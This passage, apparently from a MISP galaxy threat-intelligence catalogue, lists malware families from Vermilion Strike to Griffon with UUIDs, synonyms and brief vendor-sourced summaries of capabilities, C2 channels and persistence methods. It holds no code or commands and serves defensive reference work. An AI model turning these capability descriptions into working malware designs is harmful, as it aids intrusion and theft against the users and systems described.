UUID a4ded098-be7b-4852-adfd-8971ace583f1 which can be used as unique global reference for Vermilion Strike (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

vGet

According to Synacktiv, vGet is an in-memory stager for vShell, written in Rust.

Internal MISP references

UUID 4bf5cdc7-5b74-4d05-852b-3b2a24779cd3 which can be used as unique global reference for vGet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

VPNFilter

Internal MISP references

UUID 5ad30da2-2645-4893-acd9-3f8e0fbb5500 which can be used as unique global reference for VPNFilter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WatchBog

According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C adresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.

Internal MISP references

UUID aa00d8c9-b479-4d05-9887-cd172a11cfc9 which can be used as unique global reference for WatchBog in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WellMail

Internal MISP references

UUID 93ffafbd-a8af-4164-b3ab-9b21e6d09232 which can be used as unique global reference for WellMail in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

elf.wellmess

Internal MISP references

UUID b0046a6e-3b8b-45ad-a357-dabc46aba7de which can be used as unique global reference for elf.wellmess in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WHIRLPOOL

Internal MISP references

UUID be3a5211-45a8-496a-974f-6ef14f44af3d which can be used as unique global reference for WHIRLPOOL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WhiteRabbit

Internal MISP references

UUID 901b88e6-4759-4aa6-b4d1-9f7da53c2adf which can be used as unique global reference for WhiteRabbit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Winnti (ELF)

Internal MISP references

UUID d6c5211e-506d-415c-b886-0ced529399a1 which can be used as unique global reference for Winnti (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Wirenet (ELF)

Internal MISP references

UUID 47a8fedb-fd60-493a-9b7d-082bdb85621e which can be used as unique global reference for Wirenet (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WolfsBane

Internal MISP references

UUID 88af7974-f89a-438b-8cd2-059a9136069c which can be used as unique global reference for WolfsBane in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

X-Agent (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (ELF).

Known Synonyms
chopstick
fysbis
splm
Internal MISP references

UUID a8404a31-968a-47e8-8434-533ceaf84c1f which can be used as unique global reference for X-Agent (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Xanthe

Internal MISP references

UUID 55b4d75f-adcc-47df-81cf-6c93ccb54a56 which can be used as unique global reference for Xanthe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Xaynnalc

Internal MISP references

UUID 32b95dc7-03a6-45ab-a991-466208dd92d2 which can be used as unique global reference for Xaynnalc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Xbash

Internal MISP references

UUID ee54fc1e-c574-4836-8cdb-992ac38cef32 which can be used as unique global reference for Xbash in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

xdr33

According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.

Internal MISP references

UUID c7b1cc91-7464-436e-ac40-3b06c98400a5 which can be used as unique global reference for xdr33 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

xmrig

According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".

In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.

Internal MISP references

UUID 88efd461-03dd-42eb-976c-5e9fe403fce6 which can be used as unique global reference for xmrig in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

XOR DDoS

Linux DDoS C&C Malware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XOR DDoS.

Known Synonyms
XORDDOS
Internal MISP references

UUID 7f9df618-4bd1-44a1-ad88-e5930373aac4 which can be used as unique global reference for XOR DDoS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Zergeca

Zergeca is a DDoS-botnet and backdoor written in Golang. It uses modified UPX for packing, with the magic number 0x30219101 instead of "UPX!". It is being distributed via weak telnet passwords and known vulnerabilities.

Internal MISP references

UUID a660eeda-910a-4df5-86ba-f17d8ac93c31 which can be used as unique global reference for Zergeca in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ZeroBot

ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZeroBot.

Known Synonyms
ZeroStresser
Internal MISP references

UUID 458c583b-4353-4104-bee8-9e68cb77f151 which can be used as unique global reference for ZeroBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ZHtrap

Internal MISP references

UUID d070ff73-ad14-4f6b-951f-1645009bdf80 which can be used as unique global reference for ZHtrap in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Zollard

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zollard.

Known Synonyms
darlloz
Internal MISP references

UUID 9218630d-0425-4b18-802c-447a9322990d which can be used as unique global reference for Zollard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ZuoRAT

According to Black Lotus Labs, ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules).

Internal MISP references

UUID c4b0a7cd-b349-44a1-94ca-3d5a4ac288b2 which can be used as unique global reference for ZuoRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AutoCAD Downloader

Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AutoCAD Downloader.

Known Synonyms
Acad.Bursted
Duxfas
Internal MISP references

UUID fb22d876-c6b5-4634-a468-5857088d605c which can be used as unique global reference for AutoCAD Downloader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

COOKIESNATCH

According to Google, this is a cookie stealer

Internal MISP references

UUID 1b2d02d7-aa83-4101-ab10-2767b59c9c75 which can be used as unique global reference for COOKIESNATCH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DualToy (iOS)

Internal MISP references

UUID f7c1675f-b38a-4511-9ac4-6e475b3815e6 which can be used as unique global reference for DualToy (iOS) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GuiInject

Internal MISP references

UUID d9215579-eee0-4e50-9157-dba7c3214769 which can be used as unique global reference for GuiInject in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

lightSpy

Internal MISP references

UUID 8a1b524b-8fc9-4b1d-805d-c0407aff00d7 which can be used as unique global reference for lightSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Phenakite

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phenakite.

Known Synonyms
Dakkatoni
Internal MISP references

UUID 7ba7488c-b153-4949-8391-bcf6c4b057bd which can be used as unique global reference for Phenakite in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PoisonCarp

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PoisonCarp.

Known Synonyms
INSOMNIA
Internal MISP references

UUID 7982cc15-f884-40ca-8a82-a452b9c340c7 which can be used as unique global reference for PoisonCarp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Postlo

Internal MISP references

UUID 25bff9ad-20dc-4746-a174-e54fcdd8f0c1 which can be used as unique global reference for Postlo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TriangleDB

Internal MISP references

UUID 25754894-018b-4bed-aab6-c676fac23a77 which can be used as unique global reference for TriangleDB in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

VALIDVICTOR

According to Google, this reconnaissance payload uses a profiling framework drawing canvas to identify the target’s exact iPhone model, a technique used by many other actors. The iPhone model is sent back to the C2 along with screen size, whether or not a touch screen is present, and a unique identifier per initial GET request (e.g., 1lwuzddaxoom5ylli37v90kj). The server replies with either an AES encrypted next stage or 0, indicating that no payload is available for this device. The payload makes another request to the exploit server with gcr=1 as a parameter to get the AES decryption key from the C2.

Internal MISP references

UUID 16c0e484-7d03-46f4-870a-297d5397d693 which can be used as unique global reference for VALIDVICTOR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WireLurker (iOS)

The iOS malware that is installed over USB by osx.wirelurker

Internal MISP references

UUID bb340271-023c-4283-9d22-123317824a11 which can be used as unique global reference for WireLurker (iOS) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

X-Agent (iOS)

Internal MISP references

UUID 430b9f30-5e37-49c8-b4e7-21589f120d89 which can be used as unique global reference for X-Agent (iOS) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AdWind

Part of Malware-as-service platform Used as a generic name for Java-based RAT Functionality - collect general system and user information - terminate process -log keystroke -take screenshot and access webcam - steal cache password from local or web forms - download and execute Malware - modify registry - download components - Denial of Service attacks - Acquire VPN certificates

Initial infection vector 1. Email to JAR files attached 2. Malspam URL to downlaod the malware

Persistence - Runkey - HKCU\Software\Microsoft\Windows\current version\run

Hiding Uses attrib.exe

Notes on Adwind The malware is not known to be proxy aware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AdWind.

Known Synonyms
AlienSpy
Frutas
JBifrost
JSocket
Sockrat
UNRECOM
Internal MISP references

UUID 8eb9d4aa-257a-45eb-8c65-95c18500171c which can be used as unique global reference for AdWind in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Adzok

Internal MISP references

UUID 90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c which can be used as unique global reference for Adzok in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Akemi

According to VMRay, this malware family uses in interesting obfuscation technique: a trailing slash in its archive to confuse analysis tools. It abuses #GitHub as a #C2 and exfiltrates stolen data, such as browser cookies, via Discord webhooks. The GitHub repositories are quite active and exist since mid to late 2024. The malware also monitors keyboard and mouse input, takes screenshots.

Internal MISP references

UUID 89cb5bac-d6eb-4e3e-9fb4-ca001d138224 which can be used as unique global reference for Akemi in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Banload

F-Secure observed Banload variants silently downloading malicious files from a remote server, then installing and executing the files.

Internal MISP references

UUID 30a61fa9-4bd1-427d-9382-ff7c33bd7043 which can be used as unique global reference for Banload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Blue Banana RAT

Internal MISP references

UUID c51bbc9b-0906-4ac5-8026-d6b8b7b23e71 which can be used as unique global reference for Blue Banana RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CrossRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CrossRAT.

Known Synonyms
Trupto
Internal MISP references

UUID bae3a6c7-9e58-47f2-8749-a194675e1c84 which can be used as unique global reference for CrossRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DynamicRAT

DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DynamicRAT.

Known Synonyms
DYNARAT
Internal MISP references

UUID 28539c3d-89a4-4dd6-85f5-f4c95808c0b7 which can be used as unique global reference for DynamicRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EpicSplit RAT

EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string "packet" as a packet delimiter.

Internal MISP references

UUID 90b304a2-452a-4c74-ae8d-80d9ace881a4 which can be used as unique global reference for EpicSplit RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FEimea RAT

Internal MISP references

UUID 3724d5d0-860d-4d1e-92a1-0a7089ca2bb3 which can be used as unique global reference for FEimea RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

IceRat

According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.

Internal MISP references

UUID ac83a481-2ab4-42c2-a8b6-a4aec96e1c4b which can be used as unique global reference for IceRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

JavaDispCash

JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM's local application and the goal is to remotely control its operation. The malware's primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.

Internal MISP references

UUID 71286008-9794-4dcc-a571-164195390c39 which can be used as unique global reference for JavaDispCash in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

JavaLocker

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular JavaLocker.

Known Synonyms
JavaEncrypt Ransomware
Internal MISP references

UUID 4bdddf41-8d5e-468d-905d-8c6667a5d47f which can be used as unique global reference for JavaLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

jRAT

jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular jRAT.

Known Synonyms
Jacksbot
Internal MISP references

UUID f2a9f583-b4dd-4669-8808-49c8bbacc376 which can be used as unique global reference for jRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

jSpy

Internal MISP references

UUID ff24997d-1f17-4f00-b9b8-b3392146540f which can be used as unique global reference for jSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Mineping

DDoS for Minecraft servers.

Internal MISP references

UUID f3f38528-a8bf-496a-af46-7eb60a9ec6c3 which can be used as unique global reference for Mineping in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Octopus Scanner

Internal MISP references

UUID 8ae996fe-50bb-479b-925c-e6b1e51a9b40 which can be used as unique global reference for Octopus Scanner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pronsis Loader

According to TrustWave, this is a loader leveraging JPHP, which was observed fetching Latrodectus and Lumma.

Internal MISP references

UUID 80005653-bfbb-4a37-a8bf-87f8dc9e4047 which can be used as unique global reference for Pronsis Loader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Qarallax RAT

According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).

Internal MISP references

UUID e7852eb9-9de9-43d3-9f7e-3821f3b2bf41 which can be used as unique global reference for Qarallax RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Qealler

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Qealler.

Known Synonyms
Pyrogenic Infostealer
Internal MISP references

UUID d16a3a1f-e244-4715-a67f-61ba30901efb which can be used as unique global reference for Qealler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QRat

QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QRat.

Known Synonyms
Quaverse RAT
Internal MISP references

UUID ef385825-bfa1-4e8c-b368-522db78cf1bd which can be used as unique global reference for QRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ratty

Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.

Internal MISP references

UUID da032a95-b02a-4af2-b563-69f686653af4 which can be used as unique global reference for Ratty in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sorillus RAT

Sorillus is a Java-based multifunctional remote access trojan (RAT) that targets Linux, macOS, and Windows operating systems. First created in 2019, the tool gained significant attention in 2022 when various obfuscated client versions began appearing on VirusTotal starting January 18, 2022. The RAT's features were detailed on its now-defunct website (hxxps://sorillus[.]com), where it was marketed for lifetime access at 59.99€, with a discounted price of 19.99€ at the time. Payments were conveniently accepted via various cryptocurrencies.

The creator and distributor of Sorillus, a YouTube user known as "Tapt," claimed the tool could collect sensitive information from infected systems, including:

HardwareID

Username

Country

Language

Webcam footage

Headless status

Operating system details

Client version

However, Sorillus was shut down in 2025 following the FBI's Operation "Talent," which targeted alot of the Cracking infrastucture which included Sellix, the payment portal used by Sorillus for transactions. This operation disrupted the financial infrastructure supporting the RAT, leading to its cessation of operations 5 days later.

Internal MISP references

UUID 80694785-aeb6-4e05-a3e8-cb972993d769 which can be used as unique global reference for Sorillus RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

STRRAT

STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird.

Since Version 1.2 and above, STRRAT was infamous for its ransomware-like behavior of appending the file name extension .crimson to files. Version 1.5 is notably more obfuscated and modular than previous versions, but the backdoor functions mostly remain the same: collect browser passwords, run remote commands and PowerShell, log keystrokes, among others. Version 1.5 of STRRAT Malware includes a proper encryption routine, though currently pretty simple to revert.

Internal MISP references

UUID 6d1335d5-8351-4725-ad8a-07cabca4119e which can be used as unique global reference for STRRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SupremeBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SupremeBot.

Known Synonyms
BlazeBot
Internal MISP references

UUID 651e37e0-1bf8-4024-ac1e-e7bda42470b0 which can be used as unique global reference for SupremeBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Verblecon

This malware seems to be used for attacks installing cryptocurrency miners on infected machines. Other indicators leads to the assumption that attackers may also use this malware for other purposes (e.g. stealing access tokens for Discord chat app). Symantec describes this malware as complex and powerful: The malware is loaded as a server-side polymorphic JAR file.

Internal MISP references

UUID 793565b4-666b-47a4-b15b-de9c80c75a51 which can be used as unique global reference for Verblecon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

VersaMem

According to Lumen, a web shell used by Volt Typhoon.

Internal MISP references

UUID eb15c0ec-108e-4082-a0c1-ea41345b7db7 which can be used as unique global reference for VersaMem in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AIRBREAK

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AIRBREAK.

Known Synonyms
Orz
Internal MISP references

UUID fd419da6-5c0d-461e-96ee-64397efac63b which can be used as unique global reference for AIRBREAK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bateleur

Internal MISP references

UUID fb75a753-24ba-4b58-b7ed-2e39b0c68c65 which can be used as unique global reference for Bateleur in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BeaverTail (Javascript)

BeaverTail is a JavaScript malware primarily distributed through NPM packages. It is designed for information theft and to load further stages of malware, specifically a multi-stage Python-based backdoor known as InvisibleFerret. BeaverTail targets cryptocurrency wallets and credit card information stored in the victim's web browsers. Its code is heavily obfuscated to evade detection. Threat actors can either upload malicious NPM packages containing BeaverTail to GitHub or inject BeaverTail code into legitimate NPM projects. Researchers have identified additional Windows and macOS variants, indicating that the BeaverTail malware family is likely still under development.

Internal MISP references

UUID da0fb7ce-d730-4ee8-bcc8-3da7eba8ad79 which can be used as unique global reference for BeaverTail (Javascript) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BELLHOP

• BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host(WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways: • Creating a Run key in the Registry • Creating a RunOnce key in the Registry • Creating a persistent named scheduled task • BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin.

Internal MISP references

UUID 7ebeb691-b979-4a88-94e1-dade780c6a7f which can be used as unique global reference for BELLHOP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CACTUSTORCH

According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.

Internal MISP references

UUID efbb5a7c-8c01-4aca-ac21-8dd614b256f7 which can be used as unique global reference for CACTUSTORCH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ChromeBack

GoSecure describes ChromeBack as a browser hijacker, redirecting traffic and serving advertisements to users.

Internal MISP references

UUID ec055670-4d25-4918-90c7-281fddf3a771 which can be used as unique global reference for ChromeBack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ClearFake

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. The malware leverages social engineering to trick the user into running a fake web browser update.

Internal MISP references

UUID 8899bc6f-62e1-4732-988a-d5d64a5cf9bd which can be used as unique global reference for ClearFake in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ContagiousDrop

According to SentinelOne, these applications, typically implemented in app.js files, are deployed on ClickFix malware distribution servers. These applications run servers that listen on configured ports to handle incoming HTTP GET and POST requests, executing different functions based on the specific request path. The ContagiousDrop applications deliver malware disguised as software updates or essential utilities. They distribute a tailored payload based on the victim’s operating system (Windows, macOS, or Linux), system architecture, and method of interaction with the server, such as the use of the curl command. In addition to delivering malware, the ContagiousDrop applications feature an integrated email notification system. These notifications, sent from a configured email address, provide the Contagious Interview threat actors with insights into victim engagement and interaction patterns and are delivered to their configured recipient addresses.

Internal MISP references

UUID 22800020-7ec6-4f22-a597-84f122d35dae which can be used as unique global reference for ContagiousDrop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CryptoNight

WebAssembly-based crpyto miner.

Internal MISP references

UUID faa19699-a884-4cd3-a307-36492c8ee77a which can be used as unique global reference for CryptoNight in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CukieGrab

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CukieGrab.

Known Synonyms
Roblox Trade Assist
Internal MISP references

UUID d47ca107-3e03-4c25-88f9-8156426b7f60 which can be used as unique global reference for CukieGrab in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DarkWatchman

Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA for C&C.

Internal MISP references

UUID 4baf5a22-7eec-4ad8-8780-23a351d9b5f5 which can be used as unique global reference for DarkWatchman in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DNSRat

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSRat.

Known Synonyms
DNSbot
Internal MISP references

UUID a4b40d48-e40b-47f2-8e30-72342231503e which can be used as unique global reference for DNSRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

doenerium

Open sourced javascript info stealer, with the capabilities of stealing crypto wallets, password, cookies and modify discord clients https://github.com/doener2323/doenerium

Internal MISP references

UUID dc446dbc-6f8a-48ee-9e90-10e679a003e1 which can be used as unique global reference for doenerium in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Enrume

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Enrume.

Known Synonyms
Ransom32
Internal MISP references

UUID d6e5f6b7-cafb-476d-958c-72debdabe013 which can be used as unique global reference for Enrume in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EtherRAT

According to sysdig, EtherRAT uses Ethereum smart contracts for C2 URL resolution. It establishes persistence through five independent mechanisms, ensuring survival across reboots and system maintenance (systemd, xdg, cron, bashrc, profile).

Internal MISP references

UUID eb429cbc-bb38-4256-9dbf-7c0380485336 which can be used as unique global reference for EtherRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EVILNUM (Javascript)

According proofpoint, EvilNum is a backdoor that can be used for data theft or to load additional payloads. The malware includes multiple interesting components to evade detection and modify infection paths based on identified antivirus software.

Internal MISP references

UUID b7deec7e-24f7-4f78-9d58-9b3c1e182ab3 which can be used as unique global reference for EVILNUM (Javascript) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FakeUpdateRU

FakeUpdateRU is a malicious JavaScript code injected into compromised websites to deliver further malware using the drive-by download technique. The malicious code displays a copy of the Google Chrome web browser download page and redirects the user to the download of a next-stage payload.

Internal MISP references

UUID 9106e280-febe-45a3-9cd1-cbffafc0c85b which can be used as unique global reference for FakeUpdateRU in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FAKEUPDATES

FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT.

FAKEUPDATES has been heavily used by UNC1543, a financially motivated group.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FAKEUPDATES.

Known Synonyms
FakeUpdate
GhoLoader
SocGholish
Internal MISP references

UUID cff35ce3-8d6f-417b-ae6c-a9e6a60ee26c which can be used as unique global reference for FAKEUPDATES in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GlassWorm

According to Koi Security, this malware harvests NPM, GitHub, and Git credentials for supply chain propagation. It targets 49 different cryptocurrency wallet extensions to drain funds. It uses stolen credentials to compromise additional packages and extensions, spreading the worm further. Furthermore, it deploys SOCKS proxy servers, turning developer machines into criminal infrastructure and installs hidden VNC servers for complete remote access.

Internal MISP references

UUID 14a725a9-d610-4c3e-bce1-188fc1035749 which can be used as unique global reference for GlassWorm in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GootLoader

According to PCrisk, they discovered GootLoader malware while examining legitimate but compromised websites (mainly websites managed using WordPress). It was found that GootLoader is used to infect computers with additional malware. Cybercriminals using GootLoader seek to trick users into unknowingly downloading and executing the malware by disguising it as a document or other file.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GootLoader.

Known Synonyms
SLOWPOUR
Internal MISP references

UUID 5b2569e5-aeb2-4708-889f-c6d598bd5e14 which can be used as unique global reference for GootLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

grelos

grelos is a skimmer used for magecart-style attacks.

Internal MISP references

UUID 79580c0b-c390-4421-976a-629a5c11af95 which can be used as unique global reference for grelos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Griffon

GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Griffon.

Known Synonyms
Harpy
Internal MISP references

UUID 85c25380-69d7-4d7e-b279-6b6791fd40bd which can be used as unique global reference for Griffon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

inter

Internal MISP references

